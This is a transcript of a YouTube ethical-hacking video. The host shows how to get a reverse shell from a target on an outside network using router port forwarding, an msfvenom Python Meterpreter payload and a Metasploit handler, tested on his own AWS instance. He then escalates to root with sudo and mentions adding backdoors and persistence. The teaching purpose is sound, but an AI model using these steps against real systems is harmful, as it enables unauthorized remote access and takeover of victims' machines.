Hey everybody, welcome back to my cybersecurity show, and thanks for joining me today. Today we're going to have not a viewer requested episode, but a viewer inspired episode, I guess is a great way of putting it. Is I was in the comments and hey, somebody out there wrote in the comments and they had a great question. They were bringing up a great just a problem that you may run into, especially if you're a bit newer to how you do red teaming, hacking, ethical hacking, penetration testing, that kind of stuff. And I thought, you know what, that's a really good question, and I bet there's a lot of other people out there that would have the same one. And it's all about how do you execute a payload that is out on a network I don't control, right? How do I get something maybe like a target that's connected to the internet to reach back and actually create like a reverse shell to my system here sitting within my private network at my home? I thought, man, that is a really good question. They said they hadn't really understood how to do it. They looked it up and it just wasn't making a lot of sense to them. So I figured, hey, let's tackle that subject today and hopefully give somebody an answer. And if you were of the same mind, like, you know, I never thought about that. That's right. It's really cool to learn stuff and work within my own network, whether it be virtualized or if I've got physical hardware set up in a local network for testing and playing around with. Very cool, very fun. But how do I apply that to real life land? How do I push that out into networks I don't control? I thought, you know what, that is a good topic for us to talk about. And that's what we're going to cover today. We're going to take a look at how we can make that happen, at least one way. There's a couple of ways in which you could do it, but I'm going to go with just probably one of the more simplistic ways because I like easy. I like simple. Hopefully you do too. Before we get going too far, if you would hit that like button, right? And don't forget to subscribe if you find this content interesting, because that supports the channel and helps other people learn more about us. So just find it. It's down there somewhere. Yeah, there it is. Then hit subscribe. It didn't cost you nothing, and we really appreciate it. That said, let us move on. I'm going to go to my actual computer screen here, and there is my YouTube comment section under my AMC bypass video. If you didn't get to watch that, it's really cool stuff. Check that out. Bang, right there. And right here, this person, Hamidi, I guess that's how you pronounce that name, says, next video, talk about how I can open port on the Kali. Okay. And I'm a couple of qualifying questions. I was a little uncertain to exactly what they were trying to do because just port opening can be easy, but I was assuming there was a little more context to it. So I probed a little further, and they said that they made a payload and trying to do ethical hacking from my other phone. So I guess they're using mobile devices, but it's not working. My another phone is in another network. I was like, okay, I think I get where you're going with this. That's when my brain was starting to think they're probably working internally on their internal network. Everything's working fine. But when they've got a phone that's not connected to their Wi-Fi, it's using their cellular signal, something that affects internet connected, they don't know how to get that payload to return and make a connection to their internal network. That's where I thought I was going. I said, you know, I'm trying to confirm, make sure I understand. I said, you have a phone on the same network as your Kali box and it can connect. You also have another phone on a different network than your Kali box and it can't connect. They said, yes, I want to open a port. How can I do that? I said, they said, I've seen a lot of videos on YouTube, but the roads don't work. I'm assuming what they mean to say is that none of their solutions were really working for them. Okay, well, I'm going to have to assume a lot because there's a lot wrapped up into that, right? So if I don't answer your question 100%, I'm so sorry. It's just that you have to have full understanding of your complete network for me to give you a one-to-one answer, something that correlates with exactly what your setup is. I'm going to have to go more generalized, and hopefully the answer to what you're looking for can be extrapolated from that and applied to your situation. So Hamidi, this one's for you. Let's dive into this. Okay, so the first thing we need to talk about is basic networking, right? You need to know basic networking to understand how you make things talk to each other, right? Because if you don't know how networking works, understand things like private networks versus public networks. Like, what is the internet versus my home network? And how do those things talk to each other? You got to understand a little bit about ports. You got to understand about services, how they connect, sockets, things of that nature, right? Packets, IP, TCP, or TCP and IP, or TCP IP. Whew, a lot of cool stuff going on, but you need to understand that at least foundationally so that you can understand the answer that you're looking for. Now, what I did was I created a diagram, right? There you go. There's my diagram. And we just got a basic thing going on here. I'm using the amazing tool, Microsoft Paint. I just grabbed these things off the internet and kind of put them together here. So what we're working with here is we have a private network over here, and we see that that's a target network, right? And then we have another private network, which is the mobile target, but it's actually in the public network, right? So it's using cellular or something to connect to the internet, right? And this is a mobile target, right? And then we have our Kali network right here is our attacking network, which is also on a private network. Now, all of these private networks, like we talked about with this mobile target, connect to the public network, which is the internet, right? So this one does it through a cellular signal. This one does it through a wireless router or a cable modem. This one also does the same thing. Wireless router, cable modem. It's probably a combined entity, maybe separate into other things. But in any sense of the word, you're probably connecting to your home's Wi-Fi, and that connects you to the internet. That's what this means to represent, right? There and there. All right, so now that we have that squared away, you got to understand that this thing connects to your private network right here, but it also connects to the public network, right? So you basically have two interfaces on your cable modem, your wireless router, which probably has a cable modem inside of it. You're most likely using cable. It's possible you're using something else, but that's probably the soup du jour of the day. So that said, I've got the same thing going on this side. How do I then get this target to send something through the network and respond here? Well, that's a really good question. And that's the question I believe that Hamity is asking, right? So we need to understand the difference between private networks and public networks to make this make any kind of sense whatsoever, and how we can make this work. So let's start off with the easiest way to make this work. And I'm not even going to demonstrate it. I'm just going to kind of explain it really quickly. Basically, what I would do is I would set up a Kali box. We'll just make a little box here. My attack box, and I would make it on the internet. You can do that through things like cloud services, AWS, Linode, DigitalOcean, Azure, GCP, whatever. Pick your poison. Get something that allows you to create an instance in the public sphere. I'm going to use AWS because that's what I'm most familiar with. It's cheap. It's easy. You may, if you've never done it before, you get a free tier. It's a wonderful thing. And it allows me to create a Linux host that I control that has an internet IP address, right? So on that public network. So all I would have to do is get this box here to execute the payload, and it would make the path straight to the internet, and bing, we would have a connection. Now, that's the easiest way to do it, right? So you just have something up into the cloud, and you're off to the races. Give it that IP. If you need to know what that is, your provider will give you that information. We're going to take a look at my AWS instance in just a moment, so we'll see that information there. But that is going to be probably the just flat easiest way to make this happen. Okay. Now, that precludes I say precludes. It's simple for if you're trying to get that internet host, something that can connect to the internet, to connect to something that you control, your malicious server. Okay? Malicious. We're not doing anything bad here, hopefully. Just learning. It's all about learning. And then we can use that to be better security professionals. Now, okay, where do we go from there? So now let's go to the actual instance that we're going to talk about today, which is I want to get this host or this host to reach out to this, right? Come to me. How do I get those payloads to execute and make a connection to something that's on a private network that I control? That's a little bit more tricky. Okay, let me get these little squigglies out of the way. So what we have to do there is something called port forwarding. Port forwarding is going to allow that to occur. Okay, so but basically what happens is I tell my internet connectivity device, aka my cable modem / Wi-Fi / router / internet connectivity device, and I'm going to tell it, hey, if you see something coming from here that wants to access a port like, I don't know, 6670, then pass that on to the internal network to a device of my choosing on a port of my choosing. And it'll go, okay, and that's what's called port forwarding, right? So if I want all this to happen, I just need to set that up, and that will allow me to do that. Now I've set that up on my internal network already so that we can like demo this and show you how this works. Let me get all this loveliness out of the way. And let's go to, so you can kind of see what that would look like. I'm going to shrink this down, bring up my browser yet again. And I've got this website, ui.linksys.com, will allow you to look at UI or user interface simulators for the Linksys product line. So I can kind of look through here, find a wireless router of my choice. This E5350 looks like, just go to the UI. It's looking for a password. Can I just log in? I did not pregame this. I will go to something else that doesn't require a password. How about you, E2000? There we go. That looks better. All right. Maybe you've seen an interface that looks similar to this before. Maybe you have this exact router. Now, your mileage may vary when it comes to where you go in your interface to find this, but look for something like the words port and forwarding put together, right? So port forwarding. So a lot of times you're going to see that in something like, here we have applications and gaming. A lot of times if you're doing any kind of gaming, maybe you've set this up before so that you can set up a game server on your home network. What you're going to do is you're going to find that area, and you'll notice I have found single port forwarding, and I can either use a pre-made one, right? So whatever service that I'm looking to allow to come through, and then of course the external port that I wanted to hit, or that I'm looking for if it's being hit, and then what internal port I want it to forward to, what protocol it's going to be using, what IP address that it's going to send that information to, and whether or not it's enabled. Okay. So for me, I can just come here and we can call it, malware. Malware. Can I spell where? Yeah, there you go. Malware. I'm going to say 6670. It's just a random port I chose. And I'll set that up for TCP. I don't really have control over this part right here for whatever reason, but whatever. Let's just say it was 192.168.0.27, right? 27. And then make sure that it's enabled. Once you make all those adjustments, make sure you hit save your settings or it's not going to work. You hit your save settings. Again, your mileage may vary. You're going to have to deal with and understand your router's capabilities and where this stuff lies and how that's set up. But basic concepts and terminology should be extremely similar for whatever you're using. So once you have that set up, now port forwarding is happening. Let's go back to our diagram. So what that means is now anything that comes in, so like, I don't know, a payload executes and it finds my external IP address. It comes there, right? It hits my external interface of my internet connectivity device on my home network. And it says, hey, I want to connect using port 6670. It goes, oh, I've got a rule for that. No problem. Hey, you know what? That's actually supposed to go to in the internal network on, and if I set it on the same port, that's fine. So it's supposed to go to 192.168.0.27 on port 6670. Let me move that stuff over there for you. And then it just starts relaying the traffic. So that's what port forwarding does, and that's how we're going to be able to make this happen. Okay. Get away, little red squiggles. Okay, so now let's see how that looks. So I've got the target, right? It's up in AWS. Let's go to AWS. Here's my instance right here. And to get the information I need, well, I need to know my, my public facing IPv4 address, which is right there. That way I can connect to it. Now, typically you're not going to be able, this is going to be, if we were looking at real life LAN, what would be happening is, I'll just, is we would not have this information most likely, right? What it would be is you've given them an email, or they went to a watering hole attack, or X, Y, or Z. Somehow they got the malware with the payload onto their computer in various and sundry ways. Okay, that's cool. However that happened is how that happened. Pick your scenario, as it were, right? Close your eyes. Picture this. Sicily, 1923. Malware invades mobile device, right? Once it's on and the user executes the malware, then it should be trying to make the connection back. The only reason I need this IP address now is so that I can connect to it and act as the user, the victim, the target. Insert adjective that means person that's getting ready to get hosed, pwned right here, right? And and act as that user. So that's the only reason I need that. And what I'm going to do is I'm just going to connect using SSH, and then I will execute the malware. All right. Now, before I do that, I have a couple other things to do. One of the things I need to do is know my external facing IP address. Go back to our diagram. I need to know the interface that connects me to the internet, right? What is the IP for that? Now that's different than my internal IP address, which connects me to my internal network, right? Which also has an IP, which is, it's an internal thing. So it's 192.168.0.1. That will be the interface for that router there. But what this is, I don't know off the top of my head. I could log into my router, and you go use the web interface to check that out, or you could use a service like WhatIsMyIP, right? And it will tell you what your external IP is. Either way, grab a hold of that information. You're going to need it. Keep it private. Don't tell people that stuff because that's how they connect to you from the internet. So, and if you've set up port forwarding and they discover that, you're opening yourself up. So buyer beware. If you do this, you are opening yourself up internally to external entities, okay? Which I'm getting ready to do. And then I will change all this information. Thank goodness this is not live and is being recorded. All right, so back to the story here. So what I want to do is, now that I know what that is, I already know what that is. I've got that information. I've actually already generated my malware. I've uploaded it into my targets. In just a moment, we will execute that as the victim. But for us right now, we need to jump over to our attacking machine. Now, I'm running Parrots, but you could be running Kali. It doesn't matter. Just pretend this is Kali. If that's what you're running, that's fine. Whatever device you're using to receive the payload connectivity, okay? That's what you need to be into. So from there, now what I did was I used MSFVenom to generate the payload. I'm using a Python payload. If you want to see that, sure, what the heck, file and open tab. All I did was do a little bit of control. Let's give you a little, whoa there, Lowry, getting crazy. Just an MSFVenom to generate the payload, -p, and I think it was Python /meterpreter was it reverse shell? Oh, I gotta do the old list. I can never remember this. MSFVenom --list payloads pipe grep meterpreter. There we go. And just a second here, it'll generate that list, and I can show you the exact one I use because I don't want you going, yeah, I tried this and it didn't work. It might not work. This works in my environment, right? So you got to be able to bob and weave and figure out what you're supposed to do and where you're supposed to go. So I see a bunch of Windows stuff. I'm not running Windows. It is a Python. There we go. This is what I did. That's the payload I use. So I'm just going to copy that, and then from there, you use MSFVenom -p and then just paste that in. And then from there, do lhost equals whatever your external IP. Whenever you went to WhatIsMyIP and it showed you that IP, that's what you're going to put there. So I'm just going to say like 2.2, that's not my actual, but that's where that would go, right? And then lhost, which is going to be 6670 because that's what I set up for my port forwarding. And then just -o, and I called it malware.py, like that. Hit enter, it generates a payload, you're good to go. Let me control C that, and you can see I played with this a little bit. There we go, malware.py. All right. I, again, got that uploaded into my target in various and sundry ways. Pick your scenario. And now all I have to do is open up my handler so that it can receive the Meterpreter shell. I didn't have to use Meterpreter. Meterpreter is just a little nicer, I guess, but you could have used Netcat. Just use a standard payload. That would have been fine as well. All right, so let's do that, which is text, which is right here. So we need to use, what is it, exploit slash multi slash handler like that. Oh, what is it? Is that not? Oh, because I spelled it wrong. Hello, multi, not mullet. What is this? 1980s with Camaro hair? I don't think so. Multi handler. There we go. And then you'll notice it says configured payload using generic shell reverse TCP. That's not what we're using. We're using a Python payload. So if you look at the options, you can see all that stuff is going to be right here. And there's the payload. So I want to change that. So set payload to Python interpreter. There we go. And now when you look at options, you'll see it has changed. Bang. And now we just need to set this business. All right. So it's going to be lhost, or it's going to be set lhost. Hello, lhost to, I guess it's equals, ooh. What am I going to do here? Is it? Yes. I'm trying to remember. My brain just totally like fogged out on me, like for a hot minute there. A lot of times I'll just do O like that. I probably don't need the equals. Get that out of the way. Set lhost. Thank you. There we go. And then set lport to 6670. There we go. If you use 0.0.0.0, it just listens on any interface. So any interface that receives this should be good to go. It just makes it easier for me, at least for this specific thing. Sometimes that is not the way to go, but in this instance, it should be good. And then I just check those options one more time. I always like to verify. Everything looks good. Everything looks good. Okay. So there's that. I just need to hit run. And now it is waiting. The handler has started. Port forwarding has been enabled. We just need to execute our malware and see if we get a connection. So let's jump back over here. All right. So to do that, we're going to go to Kali. And you can see I'm on my local box, which I call Hackbox. There am I. I'm D. Lowry. And if I log in to my server here, remember, this is the victim, right? We've just logged in. We have now put on our unsuspecting user hat. And we're like, oh, we just got an email with an attachment. I totally want to look at that attachment. It's going to be amazing. I do. I go, oh, yeah, there's that attachment. I'm sure this malware.py is totally fine. I will run that with because I trust it, because I'm a crazy person. There we go. Let's see here. Blah, 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 blah. Okay, let's see if it ran. Oh, yes, absolutely it did. You can see session 1 has been opened. I can do something like shell, ID, right? Look, logged in as Ubuntu, right? Host name is now the internal IP of that AWS instance. I am logged in. I have received my payload execution, has made it to my internal network out from that internet-facing host. And I am having a great day at the beach. There you go. Now all I have to do is maybe, sudo-l kind of thing. And oh, look at that. I can run all things as with sudo as root. So I can do whatever I feel like doing and have a great time doing it, right? And I have complete control basically over this machine. So if I wanted to, I could sudo /bin bash. And look at that. I'm logged in as root. ID, you can see I'm roots. That's a good day at the beach right there. I love root shells all day long, but that's how it's done. That port forwarding aspect is what made this possible, right? So that's what's going to get those external facing, those external networks you don't really have control over, to give you that capability of running into your internal network and receiving those payload fun stuff, right? I know that was a technical term. Fun stuff is what we call popping shells in the internet. And anyway, that's what I call them anyway. Hopefully you do too. From there, it's just another day at the beach. You just got control over a shell. Make sure you give yourself some backdoor access. Do whatever you got to do. Honestly, if you set up your exploit correctly and everything, it should just give you some. It should set up things like backdoors and persistence and things of that nature. So, yeah, good times had by all. Maybe it was an initial access to the system, so you'd have to set that up afterwards. You never know. It could be that. But that's just one way in which this could be done. If you like that and you think that's cool, awesome. I'm starting to get a little parched. Look at me. Tasty stuff. It's water. But there you go. Hopefully that helped you out. Hamity, I hope that was gave you what you were looking for and explained that in a way that allows you to have some success with what you're trying to do in your little lab network there. And if you've thought about this, but you just didn't ask it, or you're like, oh my goodness, this is exactly the kind of thing I've been trying to do, hopefully that helps you out as well. If you got a different way of doing it, maybe you're like, oh, there's a better way, Daniel. I've done this quite a few times. Maybe you're a pen tester or something, red teamer, and you're like, there's a much more simpler method for doing this, or that's a dangerous. Just give me any kind of experience you have. Love to hear that stuff. So do me a favor, put that stuff in the comments, lend to this conversation, because I think it's an important one. It's something that we need to know how to do as professionals. Security professionals. If you don't know how to do that, if you want to work as a pen tester, you want to work as a red teamer, you want to do ethical hacking, you want to do security, this is one of those things that's kind of your bread and butter. So you need to be able to do that. So hopefully that was a good explanation and will allow you to perform that action. But if you've done this in a better way, you've got a better process or something that would refine this, please let us know in the comments section. Love to hear it. I'd love to hear it myself. And I always like to try new things. Like I said, this channel is just as much about my learning as it is anybody's. Actually, it is about my learning. But that forced me. I had an idea. I was like, oh yeah, I think I know how to do that. Let me check and see. And I did think correct because I understood those networking fundamentals. Because that, I got revshell, and hopefully now you do as well. That said, I do thank you for watching. We'll have more for you coming up. I hope to start posting a little bit more often. I also have an Instagram channel that is up and running. It has a couple of things. It's Daniel Lowry _. So I guess it's at Daniel Lowry _ is me on Instagram. So if you want to check that out, please do. And until next time, have a great day.